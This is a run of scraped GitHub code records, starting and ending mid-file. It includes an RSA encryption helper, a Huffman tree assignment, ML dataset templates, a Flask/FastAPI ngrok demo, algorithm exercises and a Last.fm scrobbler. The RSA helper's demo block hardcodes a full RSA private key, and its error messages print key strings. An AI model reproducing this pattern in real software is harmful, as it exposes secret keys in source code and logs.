self.block_reversed_size\n key_size = rsa_key.size_in_bits()\n if (key_size % 8) != 0:\n raise RuntimeError('RSA 密钥长度非法')\n\n # 密钥用来解密,解密不需要预留长度\n if rsa_key.has_private():\n reserve_size = 0\n\n bs = int(key_size / 8) - reserve_size\n except Exception as err:\n print('计算加解密数据块大小出错', rsa_key, err)\n return bs\n\n # 返回块数据\n def block_data(self, data, rsa_key):\n bs = self.get_block_size(rsa_key)\n for i in range(0, len(data), bs):\n yield data[i:i + bs]\n\n # 加密\n def enc_bytes(self, data, key=None):\n text = b''\n try:\n rsa_key = self.pub_key\n if key:\n rsa_key = key\n\n cipher = self.ciper_lib.new(rsa_key)\n for dat in self.block_data(data, rsa_key):\n cur_text = cipher.encrypt(dat)\n text += cur_text\n except Exception as err:\n print('RSA加密失败', data, err)\n return text\n\n # 解密\n def dec_bytes(self, data, key=None):\n text = b''\n try:\n rsa_key = self.pri_key\n if key:\n rsa_key = key\n\n cipher = self.ciper_lib.new(rsa_key)\n for dat in self.block_data(data, rsa_key):\n if type(self.ciper_lib) == Cipher.PKCS1_v1_5:\n cur_text = cipher.decrypt(dat)\n else:\n cur_text = cipher.decrypt(dat, '解密异常')\n text += cur_text\n except Exception as err:\n print('RSA解密失败', data, err)\n return text\n\n # RSA签名\n def sign_bytes(self, data, key=None):\n signature = ''\n try:\n rsa_key = self.pri_key\n if key:\n rsa_key = key\n\n h = self.hash_lib.new(data)\n signature = self.sign_lib.new(rsa_key).sign(h)\n except Exception as err:\n print('RSA签名失败', '', err)\n return signature\n\n # RSA签名验证\n def sign_verify(self, data, sig, key=None):\n try:\n rsa_key = self.pub_key\n if key:\n rsa_key = key\n h = self.hash_lib.new(data)\n self.sign_lib.new(rsa_key).verify(h, sig)\n ret = True\n except (ValueError, TypeError):\n ret = False\n return ret\n\n # 读取标准的rsa公私钥pem文件\n def load_rsa_file(self,fn):\n key = None\n try:\n key = RSA.importKey(open(fn).read())\n except Exception as err:\n print('导入rsa的KEY文件出错', fn, err)\n return key\n\n\n # 标准字符串密钥转rsa格式密钥\n def rsa_key_str2std(self,skey):\n ret = None\n try:\n ret = RSA.importKey(skey)\n except Exception as err:\n print('字符串密钥转rsa格式密钥错误', skey, err)\n return ret\n\nif __name__ == '__main__':\n pub_key = '''-----BEGIN PUBLIC KEY-----\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC7PyjMEuniN6BPn8oqzIZ6AO1N\njSTO9R3adCCIwKfKIEoWXXM+tHDpktdPKSaAsWJPTNAGvEvtxOfzXib/EMXKqD0e\nUy5MatfpRjRdf1hJVimmfrb09Qx2j7CsKLy7nD23m4xubdYBwvkjMwt/L3JxB5D6\nqryW1wei/j1c+/OCxQIDAQAB\n-----END PUBLIC KEY-----'''\n pri_key = '''-----BEGIN RSA PRIVATE KEY-----\nMIICXQIBAAKBgQC7PyjMEuniN6BPn8oqzIZ6AO1NjSTO9R3adCCIwKfKIEoWXXM+\ntHDpktdPKSaAsWJPTNAGvEvtxOfzXib/EMXKqD0eUy5MatfpRjRdf1hJVimmfrb0\n9Qx2j7CsKLy7nD23m4xubdYBwvkjMwt/L3JxB5D6qryW1wei/j1c+/OCxQIDAQAB\nAoGAT7vGYJgRNf4f6qgNS4pKHTu10RcwPFyOOM7IZ9M5380+HyXuBB6MEjowKwpH\n1fcy+LepwaR+5KG7b5uBGY4H2ticMtdysBd9gLwnY4Eh4j7LCWE54HvELpeWXkWp\nFQdb/NQhcqMAGwYsTnRPdBqkrUmJBTYqEGkIlqCQ5vUJOCECQQDhe0KGmbq1RWp6\nTDvgpA2dUmlt2fdP8oNW8O7MvbDaQRduoZnVRTPYCDKfzFqpNXL1hAYgth1N0vzD\nnv3VoLcpAkEA1JcY+rLv5js1g5Luv8LaI5/3uOg0CW7fmh/LfGuz8k/OxASN+cAO\nUjPHrxtc5xn1zat4/bnV5GEdlOp/DhquPQJBAIV2Fsdi4M+AueiPjPWHRQO0jvDV\njfwFOFZSn5YSRUa6NmtmPY6tumUJXSWWqKb1GwlVTuc3xBqXYsNLLUWwLhkCQQDJ\nUJCiD0LohhdGEqUuSKnj5H9kxddJO4pZXFSI7UEJbJQDwcBkyn+FTm2BH+tZGZdQ\nfVnlA89OJr0poOpSg+eNAkAKY85SR9KASaTiDBoPpJ8N805XEhd0Kq+ghzSThxL3\nfVtKUQLiCh7Yd8oMd/G5S3xWJHUXSioATT8uPRH2bOb/\n-----END RSA PRIVATE KEY-----'''\n\n #r = RsaHelper(pri_file='private_key.pem', pub_file='public_key.pem')\n r = RsaHelper(pub_skey=pub_key,pri_skey=pri_key)\n data = \"hello word 中国\"\n encrydata = r.enc_bytes(data.encode(encoding='utf-8'))\n encrydata =base64.b64encode(encrydata)\n print(encrydata)\n encrydata = 'uDeQATxRbbkjTBVHXa6yi8B0KOIu7HLZuvKpXz5KNYQ8RRUTE5P3MF9d4hOG3qq+zk5z8y/1EngzFvpbsljP5qc71YQZbJEUAXARBAWB9ex7GyVlLzIA/T5bF7OmcoCr4fkWt4OYzC0aaFsKsmGDXS6aWGjD6ObulIjizDZiv8k='\n encrydata = base64.b64decode(encrydata)\n encrydata = r.dec_bytes(encrydata)\n print(encrydata.decode(\"utf-8\"))","repo_name":"lhtzbj12/python_encryption","sub_path":"RsaHelper.py","file_name":"RsaHelper.py","file_ext":"py","file_size_in_byte":6428,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"246368158","text":"# Represents a Huffman tree for use in encoding/decoding strings.\n# A sample usage is as follows:\n#\n# h = HuffmanTree([('A', 2), ('B', 7), ('C', 1)])\n# assert(h.encode('ABC') == '01100')\n# assert(h.decode(h.encode('ABC')) == 'ABC')\nimport heapq\nfrom collections import defaultdict\nclass TreeNode:\n\n def __init__(self):\n self.left = None\n self.right = None\n self.symbol = None\n self.weight = 0\n self.min_element = None\n\n #in order to make TreeNode object comaparable based on their weigth and min_element\n # min_element is for ties such as (A:2)(B:1)(C:1), we can allocate A to the left.\n def __cmp__(self, other):\n return cmp((self.weight,self.min_element),( other.weight,other.min_element))\n\nclass HuffmanTree:\n # Helper object for building the Huffman tree.\n # You may modify this constructor but the grading script rlies on the left, right, and symbol fields.\n\n\n # The `symbol_list` argument should be a list of tuples `(symbol, weight)`,\n # where `symbol` is a symbol that can be encoded, and `weight` is the\n # the unnormalized probabilitiy of that symbol appearing.\n\n\n\n\n def __init__(self, symbol_list):\n assert(len(symbol_list) >= 2)\n # YOUR CODE HERE\n self.tree=[]\n self.dic=defaultdict()\n self.symbol_list=symbol_list\n self.buildTree(symbol_list)\n self.root = self.tree[0]# (place TreeNode object here)\n\n\n\n def buildTree(self,symbol_list):\n for i in symbol_list:\n node=TreeNode()\n node.weight=i[1]\n node.symbol=i[0]\n node.min_element=node.symbol\n heapq.heappush(self.tree,node)\n\n\n\n\n\n while len(self.tree)>1:\n\n node1=heapq.heappop(self.tree)\n node2=heapq.heappop(self.tree)\n\n new_node=TreeNode()\n new_node.min_element=min(node1.min_element,node2.min_element)\n\n new_node.left=node1\n new_node.right=node2\n new_node.weight=node1.weight+node2.weight\n heapq.heappush(self.tree,new_node)\n\n\n\n\n # Encodes a string of characters into a string of bits using the\n # symbol/weight list provided.\n\n def encodeHelper(self,root,char):\n ####\n\n\n if not root:\n return\n\n elif root.symbol:\n self.dic[root.symbol]=char\n\n\n\n self.encodeHelper(root.left,char+\"0\")\n self.encodeHelper(root.right,char+\"1\")\n\n\n\n def encode(self, s):\n assert(s is not None)\n # YOUR CODE HERE\n res=\"\"\n self.buildTree(self.symbol_list)\n root=self.root\n self.encodeHelper(root,\"\")\n for char in s:\n res+=self.dic[char]\n\n return str(res)\n\n\n\n # Decodes a string of bits into a string of characters using the\n # symbol/weight list provided.\n def decode(self,s):\n assert(s is not None)\n # YOUR CODE HERE\n ans=\"\"\n\n root=self.root\n if not s:\n return \"\"\n\n a = root\n for bit in s:\n\n if bit==\"0\":\n\n root=root.left\n else:\n root=root.right\n\n\n\n if not root.left and not root.right:\n ans+=root.symbol\n root=a\n\n if s!=self.encode(ans):\n return None\n\n return ans\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"acneyouth2/Algo-and-data-strucutre","sub_path":"HW3/huffman.py","file_name":"huffman.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43139069136","text":"\"\"\"\nSetup template is intended to help new users to quick start the project.\nWe abstract more and more details in the template UP the level, so that, hopefully,\nat the user implementation level (highest level), users don't need to care too much about the details\n\nCONVENTION. We will make use of the following names to name template files from lower to higher levels:\nsetup_template.py (lowest level template) \nsetup_interface1.py\nsetup_interface2.py\nsetup_interface3.py\n...\nsetup.py (highest level, to be defined by users)\n\nRemark: \n1. we shouldn't have too many setup_interfaces. Otherwise, our code design is probably bad.\n2. Ideally, higher level templates use templates from lower levels. \n\"\"\"\n\nfrom .utils import *\nfrom .data import kFoldPrep, kSplitDataset, StandardPrep, StandardDataset\nfrom torch.utils.data import Dataset\n\ndef init_new_template_model(**config):\n model = config['model']\n if model == 'MLP':\n from .model import MLP\n # For NAIVE NUMERICAL DATAFRAME (see data.py, Data Frame Types)\n return MLP(config['layers'])\n \n elif model == 'ResNet1D':\n from .model import eResNet, make_intermediate_layer_settings_eResNet\n # For NAIVE NUMERICAL DATAFRAME (see data.py, Data Frame Types)\n\n cf = config['resnet_conf']\n planes = cf['planes']\n n_blocks = cf['n_blocks']\n s = make_intermediate_layer_settings_eResNet(\n planes=planes, n_blocks=n_blocks, strides=[1,2], \n ) # see projects/resnets.py for more comments \n\n L = config['layers']\n return eResNet(1, L[-1], s, dim=1,input_type='single_flat_channel')\n\n elif model == 'Transformer':\n tfc = config['tf_conf']\n nhead, n_enc, dim_ff = tfc['nhead'], tfc['n_enc'], tfc['dim_ff']\n L = config['layers']\n\n from .model import eTFClassifier\n # For NAIVE NUMERICAL DATAFRAME (see data.py, Data Frame Types)\n # Transformer for classifier \n\n INPUT_DIMENSION, OUT_DIMENSION = L[0], L[-1]\n return eTFClassifier(INPUT_DIMENSION, OUT_DIMENSION, nhead=nhead, n_enc=n_enc, dim_ff=dim_ff)\n\n elif model == 'MLPEmb':\n from .model import MLPEmb\n # For TokenAndFloat DATAFRAME (see data.py, Data Frame Types)\n return MLPEmb(config['layers'], config['TOKEN_FEATURES'], config['NUMERICAL_FEATURES'], config['dict_leng'])\n\n elif model == 'ResNetEmb':\n from .model import eResNetEmb1D\n # For TokenAndFloat DATAFRAME (see data.py, Data Frame Types)\n\n conf = config\n L = config['layers']\n return eResNetEmb1D(conf['TOKEN_FEATURES'], conf['NUMERICAL_FEATURES'], conf['dict_leng'], L['iL_settings'], L['emb_setting'], L['C'])\n\n elif model == 'TransformerEmb':\n from .model import eTFClassifierEmb\n # For TokenAndFloat DATAFRAME (see data.py, Data Frame Types) \n conf = config\n tf_conf = config['tf_conf']\n return eTFClassifierEmb(conf['TOKEN_FEATURES'], conf['NUMERICAL_FEATURES'], conf['dict_leng'], conf['layers']['C'], dim_ff=conf['layers']['dim_ff'], nD=tf_conf['nD'], nhead=tf_conf['nhead'], n_enc=tf_conf['n_enc'],) \n\n else:\n print(model)\n raise NotImplementedError('Model not recognized?') \n\n\n#############################################\n# TypeR1\n#############################################\n\"\"\" \nTypeR1: Raw dataframe. Data is from CSV file.\nCSV file can be loaded as pandas dataframe that has \n1. many columns for features and \n2. one column for target (TARGET_LABEL_NAME). No restriction on data type of target.\n\nData is loaded without any preprocessing.\nUsage: for processed data stored CSV files. For example, in our EEC process, preprocessed data are selected in part through KMeans algorithm and stored in CSV\n\"\"\" \n\nclass DataSetupTypeR1():\n def __init__(self, RAW_DF_DIR, TARGET_LABEL_NAME):\n super(DataSetupTypeR1, self).__init__() # nothing here btw\n\n self.RAW_DF_DIR = RAW_DF_DIR\n self.TARGET_LABEL_NAME = TARGET_LABEL_NAME \n self.load_data()\n\n def load_data(self):\n df = pd.read_csv(self.RAW_DF_DIR, index_col=False) \n features = [feature for feature in df if not feature == self.TARGET_LABEL_NAME]\n df_features = df.loc[:, features] \n\n self.df = df_features.to_numpy()\n self.df_target = df.loc[:, self.TARGET_LABEL_NAME] \n\nclass DatasetTypeR1(Dataset):\n def __init__(self, setupTypeR1):\n # setupTypeR1 is DataSetupTypeR1 (see above)\n super(DatasetTypeR1, self).__init__() # nothing here btw\n\n self.df = setupTypeR1.df\n self.df_target = setupTypeR1.df_target\n\n def __len__(self):\n return len(self.df)\n\n def __getitem__(self, i):\n # overwrite this function on case by case basis\n x = self.df[i]\n y0 = self.df_target[i]\n return x, y0 \n\n\n#############################################\n# TypeK1\n#############################################\n\"\"\" \n!! See data.py \"Data CONVENTION\" to distinguish between kFoldPrep and Dataset object.\n\nData is from CSV file. Data will be indexed for k-fold validation.\nCSV file can be loaded as pandas dataframe that has \n1. many columns, each contains ONLY numbers which can be normalized\n2. no missing or invalid data (data cleaning is done)\n3. one column for target (TARGET_LABEL_NAME). No restriction on data type of target.\n\nData Frame Type: NAIVE NUMERICAL DATAFRAME (refer to data.py for more details)\n\nFeatures are transformed with sklearn pipeline or anything similar that uses .transform()\nThe pipeline has been saved as a cache in DATA_CACHE_DIR\n\nSince this performs kfold validation, it's more suitable for smaller dataset:\n repeated training and validation of large models is computationally costly\n\"\"\"\n\nclass DataSetupTypeK1(kFoldPrep):\n # A kFoldPrep Object \n def __init__(self, DIRS, **kwargs):\n # Parent classes' initiations include\n # self.indices where\n # indices[k] = {'train': train_idx, 'val': val_idx, 'test': test_idx}\n self.TARGET_LABEL_NAME = kwargs['TARGET_LABEL_NAME']\n\n # temporary setup of DIRS because we wanna quickly load the data first \n # We will load the full dir via kFoldPrep init\n self.DIRS = {\n 'DATA_DIR': DIRS['DATA_DIR'],\n 'DATA_CACHE_DIR': DIRS['DATA_CACHE_DIR']} \n\n self.load_data() # load data first\n\n # This is the kFoldPrep init (super class)\n super(DataSetupTypeK1, self).__init__(DIRS, **kwargs)\n\n def load_data(self):\n from edattr.data import replace_invalid_cell_with_blank\n\n # !! Important !! This should mirror dfPP.process_dataframe() in data.py \n df = pd.read_csv(self.DIRS['DATA_DIR'], index_col=False) \n\n features = [feature for feature in df if not feature == self.TARGET_LABEL_NAME]\n df_features = df.loc[:, features] \n\n df_features = df_features.applymap(replace_invalid_cell_with_blank, ftype='numeric') \n \n cache = joblib.load(self.DIRS['DATA_CACHE_DIR'])\n pipe = cache['feature_transform_pipeline']\n\n self.df = pipe.transform(df_features) # = df_ \n self.df_target = df.loc[:, self.TARGET_LABEL_NAME] \n\n def get_data_size(self):\n return len(self.df)\n\nclass DatasetTypeK1(kSplitDataset):\n # Note: kSplitDataset is directly descended from a pytorch Dataset object (from torch.utils.data import Dataset). See data.py\n def __init__(self, setupTypeK1, k, split):\n # setupTypeK1 is DataSetupTypeK1() (see above)\n super(DatasetTypeK1, self).__init__(setupTypeK1, k, split)\n self.df = setupTypeK1.df \n self.df_target = setupTypeK1.df_target\n\n def __len__(self):\n return len(self.indices)\n\n def __getitem__(self, i):\n # overwrite this function on case by case basis\n idx = self.indices[i] # raw index from the CSV file\n x = self.df[idx]\n y0 = self.df_target[idx]\n return idx, x, y0 \n\n\n#############################################\n# TypeK2\n#############################################\n\"\"\" \n!! See data.py \"Data CONVENTION\" to distinguish between Setup Object (like kFoldPrep) and Dataset object.\n\nData is from CSV file. Data will be indexed for k-fold validation.\nCSV file can be loaded as pandas dataframe that has \n1. columns of data that can be converted to either (1) string (2) float.\n2. one column for target (TARGET_LABEL_NAME). No restriction on data type of target.\n\nData Frame Type: TokenAndFloat DATAFRAME (refer to data.py for more details)\n\n# Features are transformed with sklearn pipeline or anything similar that uses .transform()\n# The pipeline has been saved as a cache in DATA_CACHE_DIR\n\nSince this performs kfold validation, it's more suitable for smaller dataset:\n repeated training and validation of large models is computationally costly\n\"\"\"\n\n\nclass DataSetupTypeK2(kFoldPrep):\n def __init__(self, DIRS, **kwargs):\n self.TARGET_LABEL_NAME = kwargs['TARGET_LABEL_NAME']\n self.TOKEN_FEATURES = kwargs['TOKEN_FEATURES']\n self.NUMERICAL_FEATURES = kwargs['NUMERICAL_FEATURES']\n\n # temporary setup of DIRS because we wanna quickly load the data first \n # We will load the full dir via kFoldPrep init\n self.DIRS = {\n 'DATA_DIR': DIRS['DATA_DIR'],\n 'DATA_CACHE_DIR': DIRS['DATA_CACHE_DIR']} \n\n self.load_data() # load data first\n\n super(DataSetupTypeK2, self).__init__(DIRS, **kwargs)\n\n def load_data(self):\n df = pd.read_csv(self.DIRS['DATA_DIR'], index_col=False) \n\n cache = joblib.load(self.DIRS['DATA_CACHE_DIR'])\n NUMERICAL_FEATURES = cache['NUMERICAL_FEATURES']\n TOKEN_FEATURES = cache['TOKEN_FEATURES']\n word_to_ix = cache['word_to_ix']\n\n ##### numerical part #####\n pipe = cache['numerical_feature_transform_pipeline']\n df[NUMERICAL_FEATURES] = pipe.transform(df[NUMERICAL_FEATURES])\n\n ##### tokens part #####\n def word_to_ix_mapping(x):\n return word_to_ix[x] if x in word_to_ix else 0\n df[TOKEN_FEATURES] = df[TOKEN_FEATURES].applymap(word_to_ix_mapping) \n\n self.df = df\n self.df_target = df.loc[:, self.TARGET_LABEL_NAME] \n\n def get_data_size(self):\n return len(self.df)\n\nclass DatasetTypeK2(kSplitDataset):\n # setupTypeK2 is DataSetupTypeK2() (see above)\n def __init__(self, setupTypeK2, k, split):\n super(DatasetTypeK2, self).__init__(setupTypeK2, k, split)\n self.df = setupTypeK2.df \n self.df_target = setupTypeK2.df_target \n\n self.TARGET_LABEL_NAME = setupTypeK2.TARGET_LABEL_NAME\n self.TOKEN_FEATURES = setupTypeK2.TOKEN_FEATURES\n self.NUMERICAL_FEATURES = setupTypeK2.NUMERICAL_FEATURES\n\n def __len__(self):\n return len(self.indices)\n\n def __getitem__(self, i):\n # overwrite this function on case by case basis\n idx = self.indices[i] # raw index from the CSV file\n\n tokens = self.df[self.TOKEN_FEATURES].loc[idx].to_numpy()\n numerics = self.df[self.NUMERICAL_FEATURES].loc[idx].to_numpy()\n x = np.concatenate((tokens, numerics)) # convention: token first then numeric <-- the order matters!\n\n y0 = self.df_target[idx]\n return idx, x, y0 \n\n\n#############################################\n# TypeS2\n#############################################\n\"\"\" \n!! See data.py \"Data CONVENTION\" to distinguish between Setup Object (like kFoldPrep) and Dataset object.\n\nData is from CSV file. Data will be indexed for train/val/test\nCSV file can be loaded as pandas dataframe that has \n1. columns of data that can be converted to either (1) string (2) float.\n2. one column for target (TARGET_LABEL_NAME). No restriction on data type of target.\n\nData Frame Type: TokenAndFloat DATAFRAME (refer to data.py for more details)\n\n# Features are transformed with sklearn pipeline or anything similar that uses .transform()\n# The pipeline has been saved as a cache in DATA_CACHE_DIR\n\nThis is suitable for very large dataset. For example, if you have 100k (one hundred thousand) data points, you can draw 2k for validation and 2k for testing. You can always choose more data points for val/test if you have enough resources\n\"\"\"\n\nclass DataSetupTypeS2(StandardPrep):\n def __init__(self, DIRS, **kwargs):\n self.TARGET_LABEL_NAME = kwargs['TARGET_LABEL_NAME']\n self.TOKEN_FEATURES = kwargs['TOKEN_FEATURES']\n self.NUMERICAL_FEATURES = kwargs['NUMERICAL_FEATURES']\n\n # temporary setup of DIRS because we wanna quickly load the data first \n self.DIRS = {\n 'DATA_DIR': DIRS['DATA_DIR'],\n 'DATA_CACHE_DIR': DIRS['DATA_CACHE_DIR']} \n\n self.load_data() # load data first\n\n super(DataSetupTypeS2, self).__init__(DIRS, **kwargs)\n\n def load_data(self):\n df = pd.read_csv(self.DIRS['DATA_DIR'], index_col=False) \n\n cache = joblib.load(self.DIRS['DATA_CACHE_DIR'])\n NUMERICAL_FEATURES = cache['NUMERICAL_FEATURES']\n TOKEN_FEATURES = cache['TOKEN_FEATURES']\n word_to_ix = cache['word_to_ix']\n\n ##### numerical part #####\n from edattr.data import replace_invalid_cell_with_blank\n pipe = cache['numerical_feature_transform_pipeline']\n df[NUMERICAL_FEATURES] = df[NUMERICAL_FEATURES].applymap(replace_invalid_cell_with_blank, ftype='numeric').convert_dtypes() \n df[NUMERICAL_FEATURES] = pipe.transform(df[NUMERICAL_FEATURES])\n\n ##### tokens part #####\n def word_to_ix_mapping(x):\n return word_to_ix[x] if x in word_to_ix else 0\n df[TOKEN_FEATURES] = df[TOKEN_FEATURES].applymap(word_to_ix_mapping) \n\n self.df = df\n self.df_target = df.loc[:, self.TARGET_LABEL_NAME] \n\n def get_data_size(self):\n return len(self.df) \n\n def save_new_indices(self, n, DATA_STANDARD_INDICES_DIR, \n val_fraction=0.02, test_fraction=0.02, **kwargs):\n # Overwrite the default save_new_indices() function available in StandardPrep \n \n from .data import get_standard_weighted_indices\n self.indices = get_standard_weighted_indices(n, self.df_target, \n shuffle=self.shuffle, \n val_fraction=val_fraction, \n test_fraction=test_fraction,\n NOTE_DIR=DATA_STANDARD_INDICES_DIR + '.txt',\n )\n joblib.dump(self.indices, DATA_STANDARD_INDICES_DIR) \n\n\nclass DatasetTypeS2(StandardDataset):\n # setupTypeS2 is DataSetupTypeS2() (see above)\n def __init__(self, setupTypeS2, split):\n super(DatasetTypeS2, self).__init__(setupTypeS2, split)\n self.df = setupTypeS2.df \n self.df_target = setupTypeS2.df_target \n\n self.TARGET_LABEL_NAME = setupTypeS2.TARGET_LABEL_NAME\n self.TOKEN_FEATURES = setupTypeS2.TOKEN_FEATURES\n self.NUMERICAL_FEATURES = setupTypeS2.NUMERICAL_FEATURES\n\n def __len__(self):\n return len(self.indices)\n\n def __getitem__(self, i):\n # overwrite this function on case by case basis\n idx = self.indices[i] # raw index from the CSV file\n\n tokens = self.df[self.TOKEN_FEATURES].loc[idx].to_numpy()\n numerics = self.df[self.NUMERICAL_FEATURES].loc[idx].to_numpy()\n x = np.concatenate((tokens, numerics)) # convention: token first then numeric <-- the order matters!\n\n y0 = self.df_target[idx]\n return idx, x, y0 \n","repo_name":"ericotjo001/edattr.pypi","sub_path":"src/edattr/setup_template.py","file_name":"setup_template.py","file_ext":"py","file_size_in_byte":15584,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13912501587","text":"'''\nAPI Flask\n'''\nfrom flask import *\nfrom flask_ngrok import run_with_ngrok\nfrom fastapi import FastAPI\nimport nest_asyncio\nfrom pyngrok import ngrok\nimport uvicorn\n\napp = Flask(__name__)\n\n\n@app.route('/index')\ndef home():\n return 'Hello World'\n\n\nrun_with_ngrok(app)\napp.run()\n\napp = FastAPI()\n\n\n@app.get('/index')\nasync def home():\n return \"Hello World\"\n\n\nngrok_tunnel = ngrok.connect(8000)\nprint(\n 'Public URL:https://docs.google.com/spreadsheets/d/e/2PACX-1vR0dWHCZjcG96JzSkuV3UW5R5K-Fhlr-ZH0P9FSbXIlommHrGTlNek_RRmiCgQnvYbgx-A3Qo9JqGUg/pubhtml',\n ngrok_tunnel.public_url)\nnest_asyncio.apply()\nuvicorn.run(app, port=8000)\n","repo_name":"pauloarturob/Conhecendo_python-DIO","sub_path":"IntegrationWithMongo/API-Flask_dio-PauloArtur.py","file_name":"API-Flask_dio-PauloArtur.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13953634379","text":"import sys\ninput=sys.stdin.readline\n\nN=int(input())\nINF=(1e5)\ndp=[INF for _ in range(N+1)]\n\ndp[0]=0\n\nfor i in range(1,N+1):\n root=int(i**(1/2))\n for j in range(1,root+1):\n dp[i]=min(dp[i],dp[i-j*j]+1)\n\nprint(dp[N])\n","repo_name":"SongJeKang/goodkang","sub_path":"boj/2023_02_08/1699_squarenum.py","file_name":"1699_squarenum.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16011202021","text":"import json\nimport requests\n\nclass CurrencyTrading(object):\n \"\"\"Class for trading currency\"\"\"\n def __init__(self):\n data = requests.get(\"https://api.privatbank.ua/p24api/pubinfo?json&exchange&coursid=5\")\n self.json = data.json()\n self.course = [[d[i] for i in d] for d in self.json]\n @property\n def currencys(self):\n return [\"USD\", \"EUR\", \"RUB\", \"UAH\"]\n #return list with result and value\n def trade(self, curr_from, curr_to, ammoun_of_money): \n if curr_from in self.currencys and curr_to in self.currencys and curr_from != curr_to:\n try:\n money = float(ammoun_of_money)\n if money <= 0:\n raise Exception\n #\n if curr_from != \"UAH\":\n money *= float(self.course[self.currencys.index(curr_from)][2])\n if curr_to != \"UAH\":\n money /= float(self.course[self.currencys.index(curr_to)][2])\n else:\n money /= float(self.course[self.currencys.index(curr_to)][3])\n #форматуємо сумму гроше до копійок\n return [\"Success trade\", float(\"\".join(str(money)[0:(str(money).find(\".\")+3)]))]\n except Exception:\n return [\"Wrong ammount of money\", -1]\n else:\n return [\"Wrong currency\" if (curr_from != curr_to) else \"Currencies must be different\" , -1]","repo_name":"Mxkxk/DataProcessing","sub_path":"Labs/Lab8/CurrencyTrading.py","file_name":"CurrencyTrading.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30686276345","text":"#요세푸스 문제\nimport sys\nn, k = map(int, sys.stdin.readline().rstrip().split())\narr = [i for i in range(1, n + 1)]\nresult = []\nnum = k - 1\n\nfor i in range(n):\n if len(arr) <= num:\n num = num % len(arr)\n result.append(arr.pop(num))\n num += k - 1\nprint('<%s>' %(', '.join(list(map(str, result)))))","repo_name":"jisuuuu/Algorithm_Study","sub_path":"Baekjoon/Baekjoon_python/boj_1158.py","file_name":"boj_1158.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21906987906","text":"from __future__ import annotations\n\nimport logging\nfrom typing import Iterable, Optional, TypedDict, cast\n\nimport pykka\nimport pylast\n\nfrom mopidy_advanced_scrobbler.models import Play, RecordedPlay\n\nfrom ._service import Service\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass NetworkException(Exception):\n pass\n\n\nclass NowPlayingData(TypedDict):\n artist: str\n title: str\n album: Optional[str]\n mbid: Optional[str]\n duration: Optional[int]\n\n\nclass _PartialNowPlayingData(TypedDict, total=False):\n artist: str\n title: str\n album: Optional[str]\n mbid: Optional[str]\n duration: Optional[int]\n\n\nclass PlayData(NowPlayingData):\n timestamp: int\n\n\ndef format_now_playing_data(play: Play) -> NowPlayingData:\n data: _PartialNowPlayingData = {\n \"artist\": play.artist,\n \"title\": play.title,\n }\n\n if play.album:\n data[\"album\"] = play.album\n else:\n data[\"album\"] = None\n if play.duration:\n data[\"duration\"] = play.duration\n else:\n data[\"duration\"] = None\n if play.musicbrainz_id:\n data[\"mbid\"] = play.musicbrainz_id\n else:\n data[\"mbid\"] = None\n\n return cast(NowPlayingData, data)\n\n\ndef format_play_data(play: Play) -> PlayData:\n base_data = format_now_playing_data(play)\n\n data: PlayData = {\n **base_data,\n \"timestamp\": play.played_at,\n }\n\n return data\n\n\nclass AdvancedScrobblerNetwork(pykka.ThreadingActor):\n def __init__(self, config):\n super().__init__()\n self._config = config\n self._network = None\n\n def on_start(self):\n try:\n logger.info(\"Connecting to Last.fm with username %s\", self._config[\"username\"])\n self._network = pylast.LastFMNetwork(\n api_key=self._config[\"api_key\"],\n api_secret=self._config[\"api_secret\"],\n username=self._config[\"username\"],\n password_hash=pylast.md5(self._config[\"password\"]),\n )\n logger.debug(\"Connected to Last.fm with username %s\", self._config[\"username\"])\n except pylast.PyLastError as exc:\n logger.exception(f\"Error during Advanced-Scrobbler Last.fm setup: {exc}\")\n raise\n\n def send_now_playing_notification(self, play: Play):\n now_playing_data = format_now_playing_data(play)\n\n logger.info(\"Sending 'now playing' notification: %s\", play.track_uri)\n try:\n self._network.update_now_playing(**now_playing_data)\n except pylast.PyLastError as exc:\n logger.exception(f\"Error while sending now playing data to {self._network}: {exc}\")\n raise NetworkException(\n f\"Error while sending now playing data to {self._network}\"\n ) from exc\n\n def submit_scrobble(self, play: RecordedPlay):\n play_data = format_play_data(play)\n\n logger.info(\"Submitting scrobble for play %d: %s\", play.play_id, play.track_uri)\n try:\n self._network.scrobble(**play_data)\n except pylast.PyLastError as exc:\n logger.exception(f\"Error while submitting scrobble to {self._network}: {exc}\")\n raise NetworkException(f\"Error while submitting scrobble to {self._network}\") from exc\n\n def submit_scrobbles(self, plays: Iterable[RecordedPlay]):\n plays_data = []\n play_ids = []\n for play in plays:\n plays_data.append(format_play_data(play))\n play_ids.append(play.play_id)\n\n logger.info(\"Submitting scrobbles for plays: %s\", \", \".join(map(str, play_ids)))\n try:\n self._network.scrobble_many(plays_data)\n except pylast.PyLastError as exc:\n logger.exception(f\"Error while submitting scrobbles to {self._network}: {exc}\")\n raise NetworkException(f\"Error while submitting scrobbles to {self._network}\") from exc\n\n\nnetwork_service = Service(AdvancedScrobblerNetwork)\n","repo_name":"djmattyg007/mopidy-advanced-scrobbler","sub_path":"mopidy_advanced_scrobbler/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"1346581029","text":"import numpy as np\n\n\ndef chunk_to_slice(chunk):\n \"\"\"\n Convert an openPMD_api.ChunkInfo to slice\n \"\"\"\n stops = [a + b for a, b in zip(chunk.offset, chunk.extent)]\n indices_per_dim = zip(chunk.offset, stops)\n index_tuple = map(lambda s: slice(s[0], s[1], None), indices_per_dim)\n return 